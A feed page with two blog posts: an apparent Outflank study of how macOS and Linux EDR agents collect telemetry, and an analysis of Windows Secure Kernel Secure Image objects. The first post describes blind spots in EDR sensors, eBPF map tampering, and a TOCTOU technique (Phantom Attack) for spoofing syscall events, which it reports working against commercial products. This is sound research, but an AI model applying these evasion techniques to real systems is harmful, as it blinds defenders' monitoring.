Normal view

There are new articles available, click to refresh the page.
Today — 3 June 2024Main stream

EDR Internals for macOS and Linux

3 June 2024 at 15:56

Many public blogs and conference talks have covered Windows telemetry sources like kernel callbacks and ETW, but few mention macOS and Linux equivalents. Although most security professionals may not be surprised by this lack of coverage, one should not overlook these platforms. For example, developers using macOS often have privileged cloud accounts or access to intellectual property like source code. Linux servers may host sensitive databases or customer-facing applications. Defenders must have confidence in their tools for these systems, and attackers must understand how to evade them. This post dives into endpoint security products on macOS and Linux to understand their capabilities and identify weaknesses.

Endpoint detection and response (EDR) agents comprise multiple sensors: components that collect events from one or more telemetry sources. The agent formats raw telemetry data into a standard format and then forwards it to a log aggregator. EDR telemetry data informs tools such as antivirus, but it also informs humans as they manually hunt for threats in the network.

This post should not be considered a comprehensive list of telemetry sources or EDR implementations. Instead, the following observations were made while reverse engineering some of the most popular macOS and Linux agents. Outflank tested the latest version of each product on macOS 14.4.1 (Sonoma) and Linux 5.14.0 (Rocky 9.3). After reviewing previous research, the author will describe relevant security components of macOS and Linux, present their understanding of popular EDR products, and then conclude with a case study on attacking EDR using this knowledge.

Notable EDR Capabilities

Although every product has its own “secret formula” for detecting the latest threats, nearly all EDR agents collect the following event types:

  • Authentication attempts
  • Process creation and termination
  • File access, modification, creation, and deletion
  • Network traffic

Outflank’s research primarily focused on these events, but this post will also cover other OS-specific telemetry.

Previous Research

Security researchers have covered Windows EDR internals in great detail. A quick Google search for “EDR bypass” or “EDR internals” will return an extensive corpus of blogs, conference talks, and open-source tools, all focused on Windows EDR. That said, most companies consulted by the author also deployed an EDR agent to their macOS and Linux systems. These agents are relatively undocumented compared to their Windows counterparts. This lack of information is likely due to the success of open-source tools such as Mythic and Sliver in evading out-of-the-box antivirus solutions (including those bundled with EDR).

Of course, there is full Linux kernel source code and Apple documentation, albeit not verbose, on stable macOS APIs. This alone does not give much insight into the workings of EDR agents, though, as it only describes the possible ways said agent might collect information on a system. One can glimpse some additional understanding by reviewing open-source projects, such as the outstanding Objective-See collection for macOS or container runtime security projects for Linux. Below is a list of projects that share functionality with EDR agents reversed by Outflank:


Even still, these projects do not fully replicate the capabilities of popular EDR agents. While each may collect a subset of the telemetry used by commercial products, none of these projects appeared to have the same coverage.

Telemetry Sources – macOS

Unsupported Options

In studying macOS internals, one might discover promising security components that commercial products do not use. For instance, many considered kernel extensions (KEXT) a de facto sensory component of EDR agents until Catalina (2019) phased them out completely. Michael Cahyadi’s post on the transition from kernel extensions to modern alternatives documents the work required to migrate from these frameworks.

Similarly, modern macOS (2016+) implements a standardized logging system called unified logging. Logs are categorized by subsystem (e.g., com.apple.system.powersources.source) and can be viewed with /usr/bin/log or the Console application. While unified log data is great for debugging, the logs are restricted with a private entitlement (com.apple.private.logging.stream), rendering them unusable to third-party EDR agents.

Endpoint Security API

Apple now recommends the Endpoint Security (ES) API for logging most events an EDR agent requires:

  • Authentication attempts
  • Process creation and termination
  • File access, modification, creation, and deletion

The complete list of ES event types in Apple’s documentation follows a standard format: ES_EVENT_TYPE_<RESPONSE TYPE>_<EVENT TYPE NAME>.

The “response type” can be NOTIFY or AUTH, depending on whether the ES client must authorize an action. The “event type name” describes each event. (Examples will be discussed in the following sections.)

Plenty of open-source examples exist for those looking to write an ES API client, but executing them on modern macOS requires the developer to sign their executable with a restricted entitlement or disable SIP on the target system.

Network events are notably absent from the ES API. Instead, EDR agents can utilize an additional sensor that captures events using the NetworkExtension framework.

Following Apple’s deprecation of kernel extensions, events can be collected entirely from user-mode using the ES API and NetworkExtension framework. This differs from Windows and Linux, which rely heavily on kernel-mode sensors.

Examining ES Event Types

Red Canary Mac Monitor is a free, closed-source ES client. It uses a system extension, so the client must be embedded within its application bundle in Contents/Library/SystemExtensions/. In this case, the bundle’s entitlements can be listed using the codesign utility.


codesign -d --entitlements :- /Applications/Red\ Canary\ Mac\ Monitor.app/Contents/Library/SystemExtensions/com.redcanary.agent.securityextension.systemextension

The output property list will vary depending on the target system extension, but all ES clients must have the com.apple.developer.endpoint-security.client entitlement.


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>com.apple.application-identifier</key>
      <string>UA6JCQGF3F.com.redcanary.agent.securityextension</string>
    <key>com.apple.developer.endpoint-security.client</key>
      <true/>
    <key>com.apple.developer.team-identifier</key>
        <string>UA6JCQGF3F</string>
    <key>com.apple.security.application-groups</key>
      <array>
        <string>UA6JCQGF3F</string>
      </array>
  </dict>
</plist>

ES clients must initialize the API using two functions exported by libEndpointSecurity.dylib: es_new_client and es_subscribe. The latter is particularly interesting because it indicates to the ES API which events the client should receive. Once a client of interest has been discovered, it can be instrumented using Frida (after disabling SIP). The es_subscribe function contains two parameters of interest: the number of events (event_count) and a pointer to the list of event IDs (events).


es_return_t es_subscribe(es_client_t* client, const es_event_type_t* events, uint32_t event_count);

With this information, one can inject a target system extension process with Frida and hook es_subscribe to understand which events it subscribes to. The function will likely only be called when the system extension starts, so analyzing an EDR agent may require some creative thinking. Mac Monitor makes this step easy as the runtime GUI can update the list of events.

A screenshot of the settings window in Mac Monitor that allows a user to select which ES event types the client should subscribe to.
Changing Target ES Events in Red Canary Mac Monitor

Outflank created a simple Frida script to hook es_subscribe and print the list of events, as well as an example Python script to create or inject the process.

Demo of retrieving ES API subscriptions with Frida
Retrieving ES API Events with Frida

Examining ES Event Types

Even with a list of event types, the actual data available to an ES client may not be clear. Outflank published an open-source tool called ESDump that can subscribe to any currently available event types and output JSON-formatted events to stdout.

The list of event types is defined in config.h at compile-time. For example, the following config will subscribe to the event types selected in the previous section.

A screenshot of ESDump config.h
ESDump Config

Compile the program and then copy it to a macOS system with SIP disabled. ESDump does not have any arguments.

Demo of dumping ES events with ESDump
Dumping Endpoint Security Events

ESDump uses audit tokens to retrieve IDs for the associated process and user. The program resolves process and user names to enrich raw data.

Screenshot of ESDump output where an audit token was used to resolve a process and user name
Process and User Name Resolved from Audit Token

NetworkExtension Framework

Unlike the ES API, the NetworkExtension framework does not have predefined event types. Instead, agents must subclass various framework classes to monitor network traffic. Each of these framework classes requires a different entitlement. The relevant entitlements provide insight into possible use cases:

  • DNS Proxy – Proxy DNS queries and resolve all requests from the system.
  • Content Filter – Allow or deny network connections. Meant for packet inspection and firewall applications.
  • Packet Tunnel – Meant for VPN client applications.

In addition to the DNS request and response data, providers can access metadata about the source process, including its signing identifier and application audit token. Content filter providers can also access the process audit token, which is different from the application audit token if a system process makes a network connection on behalf of an application. In both cases, these properties are enough to find the originating process and user IDs to correlate network extension data with ES API events.

Analyzing Network Extensions

Discovering the network extension provider(s) an agent implements is simple, as they each require separate entitlements. DNSMonitor from Objective-See is an open-source DNS proxy provider. It uses a system extension, so the provider must be embedded within its application bundle in Contents/Library/SystemExtensions/.

A screenshot of macOS Finder showing the content of DNSMonitor's application bundle with the user about to click "Show Package Contents" for the embedded system extension.
Opening a System Extension Bundle

Inside a system extension bundle, there will be a file at Contents/Info.plist containing information about its entitlements. The NetworkExtension key should be present, with a NEProviderClasses subkey that lists each provider implementation.

<key>NetworkExtension</key>
<dict>
	<key>NEMachServiceName</key>
	<string>VBG97UB4TA.com.objective-see.dnsmonitor</string>
	<key>NEProviderClasses</key>
	<dict>
		<key>com.apple.networkextension.dns-proxy</key>
		<string>DNSProxyProvider</string>
	</dict>
</dict>

Each provider type will also highlight the name of the associated class. This information is enough to start reversing an extension using a tool like Hopper.

A screenshot of Hopper on macOS where the built-in search is used to find method's of the "DNSProxyProvider" class.
DNS Proxy Provider Class Methods

Creating a Network Extension

While knowing the providers implemented by a macOS network extension is valuable, more is needed to understand the data available to the agent. Outflank released an open-source tool called NEDump that implements a content filter provider and writes JSON-formatted events to stdout. The application and system extension must be signed, even with SIP disabled, so the repository includes a signed release binary. As a system extension is utilized, the application must be copied to /Applications/ to function. No arguments are required to execute NEDump and start receiving event data.

Demo of dumping content filter events with NEDump
Dumping Content Filter Events

Telemetry Sources – Linux

While Linux components are deprecated less often than macOS equivalents, most Linux EDR agents had comparable, modern implementations. For example, Auditd could provide the necessary telemetry for an EDR agent, but newer alternatives have better performance. In addition, only one program can subscribe to Auditd at a time, meaning the agent may conflict with other software. Both reasons sit among the most common EDR complaints, likely explaining why Outflank did not observe any products using these methods by default.

Kernel Function Tracing

The observed agents all utilized kernel function tracing as their primary telemetry sources. Linux offers several ways to “hook” kernel functions to inspect their arguments and context. Popular EDR agents used the following trace methods:

  • Kprobes and Return Probes – Any kernel function (or address) that a client resolves can be traced using kernel probes. Function resolution requires kernel symbols to be available and likely requires different addresses for kernel versions or even distributions. Target functions may even be unavailable due to compile-time optimizations.
  • Tracepoints – A “tracepoint” is a function call added to various functions in the Linux kernel that can be hooked at runtime. These work similarly to kprobes but should be faster and do not require function resolution. However, some target functions may not have a tracepoint.
    • Raw Tracepoints – A “raw” tracepoint is a more performant alternative to any non-syscall or sys_enter/sys_exit tracepoint. These hooks can also monitor syscalls that don’t have a dedicated tracepoint.
  • Function Entry/Exit Probes – Fentry and fexit probes act similarly to tracepoints, but they are added by GCC (-pg).

Kernel-Mode Programming

Traditionally, only loadable kernel modules (LKM) could use kernel tracing features. LKMs are similar to Windows drivers—crashes may result in unrecoverable kernel errors, raising similar stability concerns. Linux kernel versions 4.x implement an “extended” version of Berkeley Packet Filter to address these concerns called eBPF. This feature allows developers to load small, verifiable programs into the kernel. eBPF programs have material constraints, but they should mitigate the stability risks of LKM-based sensors. Only newer Linux kernel versions support eBPF and certain advanced eBPF features; customers may not have these versions deployed across their environments. This led many EDR vendors to offer two (or more!) versions of their Linux agent, each targeting a different kernel version.

Liz Rice from Isovalent wrote an excellent, free book on eBPF. The company also has a free eBPF lab on its website for those who prefer a hands-on approach. Many open-source projects demonstrate good examples of eBPF-based tracing. This post only covers the newest eBPF variant of each agent, but it is safe to assume that other variants collect similar information with a slightly modified eBPF or LKM-based sensor.

Analyzing eBPF Programs

Two components of eBPF-based sensors may provide insights into their implementation: programs and maps. Each eBPF program typically monitors a single kernel function and uses a map to communicate with the user-mode agent. Microsoft SysmonForLinux is a well-documented, open-source eBPF-based monitoring tool. It uses several tracepoints to monitor process, file, and networking events. Once installed, a complete list of currently loaded programs can be retrieved using bpftool with the bpftool prog list command. The results usually include unrelated programs, but the PIDs can identify relevant results, as seen below.


52: raw_tracepoint  name ProcCreateRawExit  tag ebba2584bc0537a4  gpl
        loaded_at 2024-05-14T12:42:20-0500  uid 0
        xlated 6912B  jited 3850B  memlock 8192B  map_ids 3,5,11,9,8,10
        btf_id 54
        pids sysmon(807)

The bytecode of an eBPF program is accessible as well, using the bpftool prog dump command.


int ProcCreateRawExit(struct bpf_our_raw_tracepoint_args * ctx):
0xffffffffc02f18e8:
; int ProcCreateRawExit(struct bpf_our_raw_tracepoint_args *ctx)
   0:	nopl   0x0(%rax,%rax,1)
   5:	xchg   %ax,%ax
   7:	push   %rbp
   8:	mov    %rsp,%rbp
   b:	sub    $0x98,%rsp
  12:	push   %rbx

Additionally, the bpftool map list command will retrieve a complete list of maps. Again, there are unrelated results, but the PIDs describe associated processes.

11: array  name eventStorageMap  flags 0x0
        key 4B  value 65512B  max_entries 512  memlock 33546240B
        pids sysmon(807) 

The contents of a map can be accessed with bpftool map dump.


key:
00 00 00 00
value:
01 ff 00 00 40 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
ea 02 00 00 0c 56 00 00  85 88 52 b5 30 ee 3c 00
00 00 08 00 24 81 00 00  61 d7 37 66 00 00 00 00
ac 4e a8 08 00 00 00 00  61 d7 37 66 00 00 00 00
ac 4e a8 08 d7 8f ff ff  61 d7 37 66 00 00 00 00
ac 4e a8 08 00 00 00 00  00 00 00 00 20 00 00 00

Retrieving the name and bytecode for each program should be enough to understand which functions an eBPF agent monitors. Outflank created a Bash script to expedite the enumeration described above.

Sensor Implementations – macOS

The EDR agents Outflank reviewed on macOS all had similar implementations. The following sections aim to describe commonalities as well as any unique approaches.

Authentication Events

Multiple agents collected authentication data using getutxent, some at regular intervals and others in response to specific events. For instance, one agent used the Darwin Notification API to subscribe to com.apple.system.utmpx events. Outflank created another Frida script that can be used with hook.py script to examine these subscriptions.

Other agents subscribed to the following ES API events as a trigger to check utmpx:

  • AUTHENTICATION – The most general authentication event. Generated by normal login, sudo usage, and some remote logins.
  • PTY_GRANT/CLOSE – Records each pseudoterminal control device (shell session), including local Terminal and remote SSH connections.
  • LW_SESSION_LOGIN/LOGOUT – Occurs when a user logs in normally. Includes the username and a “graphical session ID” that appears to track whether a session has ended.
  • OPENSSH_LOGIN/LOGOUT – SSH logins, including failed attempts. Includes the username and source address.
  • LOGIN_LOGIN/LOGOUT – Official documentation states these events are generated for each “authenticated login event from /usr/bin/login“. The author was unable to produce events of this type.

Process Events

All the reviewed macOS agents subscribed to the following process event types.

  • EXEC
  • FORK
  • EXIT

File Events

All the reviewed macOS agents subscribed to the following file event types:

  • CREATE
  • OPEN
  • CLOSE
  • LINK
  • UNLINK
  • RENAME
  • MOUNT
  • CLONE
  • SETMODE
  • SETOWNER
  • SETFLAGS
  • SETEXTATTR

A subset of the agents subscribed to additional event types:

  • UNMOUNT
  • READDIR
  • DELETEEXTATTR
  • SETATTRLIST
  • REMOUNT
  • TRUNCATE
  • SETACL – Although macOS uses POSIX file permissions, it also implements more granular access control using Access Control Lists (ACL).

Network Events

All the reviewed macOS agents used a network extension to implement a content filter provider. Refer to the previous sections for more information on the data available to content filters.

macOS-Specific Events

Each macOS agent was subscribed to a subset of the following OS-specific events:

  • REMOTE_THREAD_CREATE
  • PROC_SUSPEND_RESUME
  • XP_MALWARE_DETECTED – XProtect, the built-in macOS antivirus, detected malware. A complimentary event type, XP_MALWARE_REMEDIATED, indicates that malware was removed.
  • GET_TASK_READ/INSPECT/NAME – A process retrieved the task control/read/inspect/name port for another process. Mach ports are an IPC mechanism on macOS.
  • CS_INVALIDATED – The code signing status for a process is now invalid, but that process is still running.
  • SIGNAL – A process sent a signal to another process.
  • UIPC_CONNECT – A process connected to a UNIX domain socket.
  • BTM_LAUNCH_ITEM_ADD – A launch item was made known to background task management. This includes common macOS persistence methods like launch agents/daemons and login items.

Sensor Implementations – Linux

Unlike macOS agents, the Linux agents reviewed by Outflank had much greater diversity in their implementations. The following sections compare approaches taken by various products.

Authentication Events

A subset of the reviewed Linux agents hooked the following PAM functions:

  • pam_authenticate – Includes failed login attempts.
  • pam_open_session – Likely required to correlate other events with a user session.

Other agents monitored specific files to capture authentication events:

  • /var/run/utmp
  • /var/log/btmp – Includes failed login attempts.

Process Events

Each Linux agent used a tracepoint (some used raw tracepoints) for sched_process_exec. One product also placed a fentry probe on finalize_exec, an internal kernel function called by execve, but it was unclear what additional information this could provide. Only some agents appeared to monitor fork usage with a sched_process_fork tracepoint. All agents monitored process termination with tracepoints or fentry probes on sched_process_exit, taskstats_exit, sys_exit_setsid, or exit.

File Events

A subset of the reviewed Linux agents only monitored the following syscalls using fentry probes or kprobes:

  • chdir
  • chmod
  • chown
  • clone
  • clone_file_range
  • copy_file_range
  • dup
  • fallocate
  • fchdir
  • fchmod
  • fchmodat
  • fchown
  • fchownat
  • openat
  • pwrite
  • read
  • rename
  • renameat
  • renameat2
  • sendfile
  • setfsgid
  • setfsuid
  • setgid
  • setregid
  • setresgid
  • setreuid
  • setsid
  • setuid
  • truncate
  • unlink
  • unlinkat
  • unshare
  • write

While some agents relied entirely on syscalls, others only traced a few and attached fentry probes or kprobes to the following internal kernel functions:

  • chmod_common
  • chown_common
  • do_filp_open
  • ioctl_file_clone
  • locks_remove_file
  • mnt_want_write
  • notify_change
  • security_file_open
  • security_file_permission
  • security_inode_getattr
  • security_inode_getxattr
  • security_inode_removexattr
  • security_inode_setxattr
  • security_inode_unlink
  • security_mmap_file
  • security_path_link
  • security_path_mkdir
  • security_path_rename
  • security_path_unlink
  • security_sb_free
  • security_sb_mount
  • vfs_copy_file_range
  • vfs_fallocate
  • vfs_link
  • vfs_rename
  • vfs_unlink
  • vfs_write

Network Events

Outflank observed two general strategies for monitoring network traffic. Some agents monitored the following syscalls using kprobes or fentry probes:

  • socket
  • bind
  • accept
  • setsockopt
  • socketcall

Instead of monitoring networking syscalls, the remaining agents traced the following internal kernel functions with fentry or kprobes:

  • sock_create
  • inet_bind/inet6_bind
  • inet_sendmsg/inet6_sendmsg
  • inet_recvmsg/inet6_recvmsg
  • inet_csk_accept
  • inet_accept
  • inet_listen
  • tcp_close
  • inet_release
  • tcp_v4_connect/tcp_v6_connect
  • inet_dgram_connect – UDP
  • inet_stream_connect – TCP
  • sock_common_recvmsg – DCCP
  • sk_attach_filter – Called when SO_ATTACH_FILTER is passed to setsockopt.

Linux-Specific Events

Each Linux agent subscribed to a subset of the following OS-specific events.

  • security_bpf_map – Another program on the system can access or modify eBPF maps, but it usually requires the CAP_SYS_ADMIN or CAP_BPF capability. This means privileged users may be able to tamper with sensor data to silence or even spoof events. In response, some EDR agents monitor eBPF to protect their programs and maps.
  • security_ptrace_access_check – Monitors ptrace attempts.
  • security_netlink_send – Monitors netlink, an interface for sharing data between user-mode processes and the Linux kernel.
  • madvise – The author suspects some agents hooked this syscall to detect the exploitation of vulnerabilities like Dirty COW.

Case Study: Spoofing Linux Syscalls

Diving into an application often inspires security researchers to discover logical flaws that lead to unintended yet desirable results. The example highlighted in this section still affects popular commercial products, and the author hopes to inspire additional community research in this space.

Phantom Attack

At DEF CON 29, Rex Guo and Junyuan Zeng exploited a TOCTOU vulnerability for Falco and Tracee. Their exploit for “Phantom Attack v1” demonstrates an ability to spoof specific fields in some network (connect) and file (openat) events. The attack requires three separate threads, as shown below.

A flow diagram of the Linux Phantom V1 exploit
Phantom Attack Steps

A slight variation is required for the openat syscall, but it is conceptually similar. Ideally, the time-of-use (immediately after the page fault is handled) happens before benign data can be written to the original page. In practice, their POC was very reliable but required elevated privileges. According to its manual, userfaultfd requires the CAP_SYS_PTRACE capability since Linux 5.2. An alternative method of extending the TOCTOU window would be enough to exploit this vulnerability as a normal user.

Falco and Tracee used kernel function tracing, but they were vulnerable to the attack because they traced system calls instead of internal kernel functions. Arguments provided by user-mode were evaluated directly, including pointers to memory allocated by the calling process. As described above, some EDR agents monitored networking with syscall kprobes, implying they are likely vulnerable to the same attack. Indeed, Outflank’s fork of the “Phantom Attack v1” POC for connect worked against multiple EDR products in testing. As demonstrated below, the original code was modified to make an HTTP GET request to the target (in this case, google.com) and output the response.

A screenshot of an unnamed EDR console, proving it was affected by the TOCTOU vulnerability
Spoofing the Remote IP for connect

Outflank utilizes its knowledge of Windows, macOS, and Linux EDR to identify opportunities for evasion. In order to help other red teams easily implement these techniques and more, we’ve developed Outflank Security Tooling (OST), a broad set of evasive tools that allow users to safely and easily perform complex tasks. Consider scheduling an expert-led demo to learn more about the diverse offerings in OST.

The post EDR Internals for macOS and Linux appeared first on Outflank.

Windows Internals: Dissecting Secure Image Objects - Part 1

1 June 2024 at 00:00

Introduction

Recently I have been working on an un-published (at this time) blog post that will look at how securekernel.exe and ntoskrnl.exe work together in order to enable and support the Kernel Control Flow Guard (Kernel CFG) feature, which is enabled under certain circumstances on modern Windows systems. This comes from the fact that I have recently been receiving questions from others on this topic. During the course of my research, I realized that a relatively-unknown topic that kept reappearing in my analysis was the concept of Normal Address Ranges (NARs) and Normal Address Table Entries (NTEs), sometimes referred to as NT Address Ranges or NT Address Table Entries. The only mention I have seen of these terms comes from Windows Internals 7th Edition, Part 2, Chapter 9, which was written by Andrea Allievi. The more I dug in, the more I realized this topic could probably use its own blog post.

However, when I started working on that blog post I realized that the concept of “Secure Image Objects” also plays into NAR and NTE creation. Because of this, I realized I maybe could just start with Secure Image objects!

Given the lack of debugging capabilities for securekernel.exe, lack of user-defined types (UDTs) in the securekernel.exe symbols, and overall lack of public information, there is no way (as we will see) I will be able to completely map Secure Image objects back to absolute structure definitions (and the same goes with NAR/NTEs). This blog (and subsequent ones) are really just analysis posts outlining things such as Secure System Calls, functionality, the reverse engineering methodology I take, etc. I am not an expert on this subject matter (like Andrea, Satoshi Tanda, or others) and mainly writing up my analysis for the sheer fact there isn’t too much information out there on these subjects and I also greatly enjoy writing long-form blog posts. With that said, the “song-and-dance” performed between NT and Secure Kernel to load images/share resources/etc. is a very complex (in my mind) topic. The terms I use are based on the names of the functions, and may differ from the actual terms as an example. So please feel free to reach out with improvements/corrections. Lastly, Secure Image objects can be created for other images other than drivers. We will be focusing on driver loads. With this said, I hope you enjoy!

SECURE_IMAGE Overview

Windows Internals, 7th Edition, Chapter 9 gives a brief mention of SECURE_IMAGE objects:

…The NAR contains some information of the range (such as its base address and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers (in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated by the NT memory manager as private pages that contain executable code…

As we know with HVCI (at the risk of being interpreted as pretentious, which is not my intent, I have linked my own blog post), VTL 1 is responsible for enforcing W^X (write XOR execute, meaning WX memory is not allowed). Given that drivers can be dynamically loaded at anytime on Windows, VTL 0 and VTL 1 need to work together in order to ensure that before such drivers are actually loaded, the Secure Kernel has the opportunity to apply the correct safeguards to ensure the new driver isn’t used, for instance, to load unsigned code. This whole process starts with the creation of the Secure Image object.

This is required because the Secure Kernel needs to monitor access to some of the memory present in VTL 0, where “normal” drivers live. Secure Image objects allow the Secure Kernel to manage the state of these runtime drivers. Managing the state of these drivers is crucial to enforcing many of the mitigations provided by virtualization capabilities, such as HVCI. A very basic example of this is when a driver is being loaded in VTL 0, we know that VTL 1 needs to create the proper Second Layer Address Translation (SLAT) protections for each of the given sections that make up the driver (e.g., the .text section should be RX, .data RW, etc.). In order for VTL 1 to do that, it would likely need some additional information and context, such as maybe the address of the entry point of the image, the number of PE sections, etc. - this is the sort of thing a Secure Image object can provide - which is much of the needed context that the Secure Kernel needs to “do its thing”.

This whole process starts with code in NT which, upon loading runtime drivers, results in NT extracting the headers from the image being loaded and sending this information to the Secure Kernel in order to perform the initial header verification and build out the Secure Image object.

I want to make clear again - although the process for creating a Secure Image object may start with what we are about to see in this blog post, even after the Secure System Call returns to VTL 0 in order to create the initial object, there is still a “song-and-dance” performed by ntoskrnl.exe, securekernel.exe, and skci.dll. This specific blog does not go over this whole “song-and-dance”. This blog will focus on the initial steps taken to get the object created in the Secure Kernel. In future blogs we will look at what happens after the initial object is created. For now, we will just stick with the initial object creation.

A Tiny Secure System Call Primer

Secure Image object creation begins through a mechanism known as a Secure System Call. Secure System Calls work at a high-level similarly to how a traditional system call works:

  1. An untrusted component (NT in this case) needs to access a resource in a privileged component (Secure Kernel in this case)
  2. The privileged component exposes an interface to the untrusted component
  3. The untrusted component packs up information it wants to send to the privileged component
  4. The untrusted component specifies a given “call number” to indicate what kind of resource it needs access to
  5. The privileged component takes all of the information, verifies it, and acts on it

A “traditional” system call will result in the emission of a syscall assembly instruction, which performs work in order to change the current execution context from user-mode to kernel-mode. Once in kernel-mode, the original request reaches a specified dispatch function which is responsible for servicing the request outlined by the System Call Number. Similarly, a Secure System Call works almost the same in concept (but not necessarily in the technical implementation). Instead of syscall, however, a vmcall instruction is emitted. vmcall is not specific to the Secure Kernel and is a general opcode in the 64-bit instruction set. A vmcall instruction simply allows guest software (in our case, as we know from HVCI, VTL 0 - which is where NT lives - is effectively treated as “the guest”) to make a call into the underlying VM monitor/supervisor (Hyper-V). In other words, this results in a call into Secure Kernel from NT.

The NT function nt!VslpEnterIumSecureMode is a wrapper for emitting a vmcall. The thought process can be summed up, therefore, as this: if a given function invokes the nt!VslpEnterIumSecureMode function in NT, that caller of said function is responsible (generally speaking mind you) of invoking a Secure System Call.

Although performing dynamic analysis on the Secure Kernel is difficult, one thing to note here is that the order the Secure Systm Call arguments are packed and shipped to the Secure Kernel is the same order the Secure Kernel will operate on them. So, as an example, the function nt!VslCreateSecureImageSection is one of the many functions in NT that results in a call to nt!VslpEnterIumSecureMode.

The Secure System Call Number, or SSCN, is stored in the RDX register. The R9 register, although not obvious from the screenshot above, is responsible for storing the packed Secure System Call arguments. These arguments are packed in the form of a in-memory typedef struct structure (which we will look at later).

On the Secure Kernel side, the function securekernel!IumInvokeSecureService is a very large function which is the “entry point” for Secure System Calls. This contains a large switch/case statement that correlates a given SSCN to a specific dispatch function handler. The exact same order these arguments are packed is the exact same order they will be unpacked and operated on by the Secure Kernel (in the screenshot below, a1 is the address of the structure, and we can see how various offsets are being extracted from the structure, which is due to struct->Member access).

Now that we have a bit of an understanding here, let’s move on to see how the Secure System Call mechanism is used to help Secure Kernel create a Secure Image object!

SECURE_IMAGE (Non-Comprehensive!) Creation Overview

Although by no means is this a surefire way to identify this data, a method that could be employed to locate the functionality for creating Secure Image objects is to just search for terms like SecureImage in the Secure Kernel symbols. Within the call to securekernel!SkmmCreateSecureImageSection we see a call to an externally-imported function, skci!SkciCreateSecureImage.

This means it is highly likely that securekernel!SkmmCreateSecureImageSection is responsible for accepting some parameters surrounding the Secure Image object creation and forwarding that on to skci!SkciCreateSecureImage. Focusing our attention on securekernel!SkmmCreateSecureImageSection we can see that this functionality (securekernel!SkmmCreateSecureImageSection) is triggered through a Secure System Call with an SSCN of 0x19 (the screenshot below is from the securekernel!IumInvokeSecureService Secure System Call dispatch function).

Again, by no means is this correct in all cases, but I have noticed that most of the time when a Secure System Call is issued from ntoskrnl.exe, the corresponding “lowest-level function”, which is responsible for invoking nt!VslpEnterIumSecureMode, has a similar name to the associated sispatch function in securekernel.exe which handles the Secure System Call. Luckily this applies here and the function which issues the SSCN of 0x19 is the nt!VslCreateSecureImageSection function.

Based on the call stack here, we can see that when a new section object is created for a target driver image being loaded, the ci.dll module is dispatched in order to determine if the image is compatible with HVCI (if it isn’t, STATUS_INVALID_IMAGE_HASH is returned). Examining the parameters of the Secure System Call reveals the following.

Note that at several points I will have restarted the machine the analysis was performed on and due to KASLR the addresses will change. I will provide enough context in the post to overcome this obstacle.

With Secure System Calls, the first parameter (seems to be) always 0 and/or reserved. This means the arguments to create a Secure Image object are packed as follows.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID VirtualAddress;
    PVOID PageFrameNumber;
    bool Unknown;
    ULONG Unknown;
    ULONG Unknown1;
} SECURE_IMAGE_CREATE_ARGS;

As a small point of contention, I know that the page frame number is such because I am used to dealing with looking into memory operations that involve both physical and virtual addresses. Anytime I see I am dealing with some sort of lower-level concept, like loading a driver into memory and I see a value that looks like a ULONG paired with a virtual address, I always assume this could be a PFN. I always assume this further in cases especially when the ULONG value is not aligned. A physical memory address is simply (page frame number * 0x1000), plus any potential offset. Since there is not 0 or 00 at the end of the address, this tells me that this is the page frame number. This is not a “sure” method to do this, but I will show how I validated this below.

At first, I was pretty stuck on what this first virtual address was used for. We previously saw the call stack which is responsible for invoking nt!VslCreateSecureImageSection. If you trace execution in IDA, however, you will quickly see this call stack is a bit convoluted as most of the functions called are called via function pointer as an input parameter from other functions making tracing the arguments a bit difficult. Fortunately, I saw that this virtual address was used in a call to securekernel!SkmmMapDataTransfer almost immediately within the Secure System Call handler function (securekernel!SkmmCreateSecureImageSection). Note although IDA is annotated a bit with additional information, we will get to that shortly.

It seems this function is actually publicly-documented thanks to Saar Amar and Daniel King’s BlackHat talk! This actually reveals to us that the first argument is an MDL (Memory Descriptor List) while the second parameter, which is PageFrameNumber, is a page frame number which we don’t know its use yet.

According to the talk, securekernel.exe tends to use MDLs, which are provided by VTL 0, for cases where data may need to be accessed by VTL 1. By no means is this an MDL internals post, but I will give a brief overview quickly. An MDL (nt!_MDL) is effectively a fixed-sized header which is prepended to a variable-length array of page frame numbers (PFNs). Virtual memory, as we know, is contiguous. The normal size of a page on Windows is 4096, or 0x1000 bytes. Using a contrived example (not taking into account any optimizations/etc.), let’s say a piece of malware allocated 0x2000 bytes of memory and stored shellcode in that same allocation. We could expect the layout of memory to look as follows.

We can see in this example the shellcode spans the virtual pages 0x1ad2000 and 0x1ad3000. However, this is the virtual location, which is contiguous. In the next example, the reality of the situation creeps in as the physical pages which back the shellcode are in two separate locations.

An MDL would be used in this case to describe the physical layout of the memory of a virtual memory region. The MDL is used to say “hey I have this contiguous buffer in virtual memory, but here are the physical non-contiguous page(s) which describe this contiguous range of virtual memory”.

MDLs are also typically used for direct memory access (DMA) operations. DMA operations don’t have the luxury of much verification, because they need to access data quickly (think UDP vs TCP). Because of this an MDL is used because it typically first locks the memory range described into memory so that the DMA operation doesn’t ever access invalid memory.

One of the main features of an MDL is that it allows multiple mappings for the given virtual address a given MDL described (the StartVa is the beginning of the virtual address range the MDL describes). For instance, consider an MDL with the following layout: a user-mode buffer is described by an MDL’s StartVa. As we know, user-mode addresses are only valid within the process context of which they reside (and the address space is per-process based on the current page table directory loaded into the CR3 register). Let’s say that a driver, which is in an arbitrary context needs to access the information in the user-mode buffer contained in Mdl->StartVa. If the driver goes to access this, and the process context is processA.exe but the address was only valid in processB.exe, you are accessing invalid memory and you would cause a crash.

An MDL allows you, through the MmGetSystemAddressForMdlSafe API, to actually request that the system map this memory into the system address space, from the non-paged pool. This allows us to access the contents of the user-mode buffer, through a kernel-mode address, in an arbitrary process context.

Now, using that knowledge, we can see that the exact same reason VTL 0 and VTL 1 use MDLs! We can think of VTL 0 as the “user-mode” portion, and VTL 1 as the “kernel-mode” portion, where VTL 0 has an address with data that VTL 1 wants. VTL 1 can take that data (in the form of an MDL) and map it into VTL 1 so it can safely access the contents of memory described by the MDL.

